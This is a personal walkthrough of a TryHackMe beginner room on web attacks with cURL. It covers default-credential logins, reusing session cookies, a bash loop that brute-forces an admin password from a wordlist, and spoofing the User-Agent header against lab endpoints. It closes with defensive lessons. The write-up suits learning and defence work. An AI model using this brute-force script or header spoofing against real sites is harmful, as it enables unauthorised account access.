Exploitation with cURL

Overview

Room URL: https://tryhackme.com/room/webhackingusingcurl-aoc2025-w8q1a4s7d0
Difficulty: Easy
Category: Curl
Date Completed: 12/26/2025

Objective

Understand what HTTP requests and responses are at a high level.
Use cURL to make basic requests (using GET) and view raw responses in the terminal.
Send POST requests with cURL to submit data to endpoints.
Work with cookies and sessions in cURL to maintain login state across requests.

Introduction
Walk Through
Lessons Learned
Resources

Introduction

This TryHackMe challenge serves as a practical introduction to HTTP request manipulation using cURL, demonstrating how command-line tools can interact with web applications without a browser. The challenge progressively builds skills through five core tasks plus a bonus mission, covering fundamental web exploitation concepts including POST request crafting, session cookie management, credential brute forcing, and User-Agent spoofing. Participants assume the role of a blue team operator tasked with testing various authentication mechanisms and ultimately closing a wormhole by infiltrating an Easter bunny control panel in the bonus mission.

Key Information

cURL Flags:

-X POST: Specify HTTP method
-d: Define POST data payload
-c: Save received cookies to file
-b: Send cookies from file
-A: Spoof User-Agent header
-s: Silent mode (suppress progress meter)
-i: Include HTTP response headers

Walk Through

Start Target Machine & Connect to VPN
1. curl http://10.66.181.228/
Make a POST request to the /post.php endpoint with the username admin and the password admin. What is the flag you receive?
1. curl -X POST -d "username=admin&password=admin" http://10.66.181.228/post.php
Make a request to the /cookie.php endpoint with the username admin and the password admin and save the cookie. Reuse that saved cookie at the same endpoint. What is the flag your receive?
1. curl -c cookies.txt -d "username=admin&password=admin" http://10.66.181.228/cookie.php
2. curl -b cookies.txt http://10.66.181.228/cookie.php

After doing the brute force on the /bruteforce.php endpoint, what is the password of the admin user?

nano passwords.txt

admin123
password
letmein
secretpass
secret

nano loop.sh

    for pass in $(cat passwords.txt); do
      echo "Trying password: $pass"
      response=$(curl -s -X POST -d "username=admin&password=$pass" http://10.66.181.228/bruteforce.php)
      if echo "$response" | grep -q "Welcome"; then
        echo "[+] Password found: $pass"
        break
      fi
    done

chmod +x loop.sh
./loop.sh

Make a request to the /agent.php endpoint with the user-agent TBFC. What is the flag your receive?
1. curl -A "internalcomputer" http://10.66.181.228/ua_check.php
2. curl -i http://10.66.181.228/ua_check.php
3. curl -i -A "internalcomputer" http://10.66.181.228/ua_check.php
4. curl -A "TBFC" http://10.66.181.228/agent.php

Lessons Learned

Weak Credential Management: Using default credentials (admin/admin) violates the principle of least privilege and secure defaults. Organizations must enforce strong password policies and eliminate default accounts before production deployment.
Insufficient Rate Limiting: The brute force endpoint lacked attempt throttling or account lockout mechanisms. Implementing exponential backoff, CAPTCHA after N failed attempts, or temporary account locks would significantly impede automated attacks.
Client-Side Security Controls: Relying on User-Agent validation for access control demonstrates "security through obscurity." Client-controlled headers are trivially spoofed and should never be trusted for authentication or authorization decisions.
Predictable Session Management: Session tokens that follow predictable patterns or aren't properly validated enable session hijacking. Implementing cryptographically secure random session IDs with proper expiration is essential.

Resources

TryHackMe
cURL

Revision #1
Created 2026-01-02 17:59:55 UTC by David Rizzo
Updated 2026-01-02 18:08:33 UTC by David Rizzo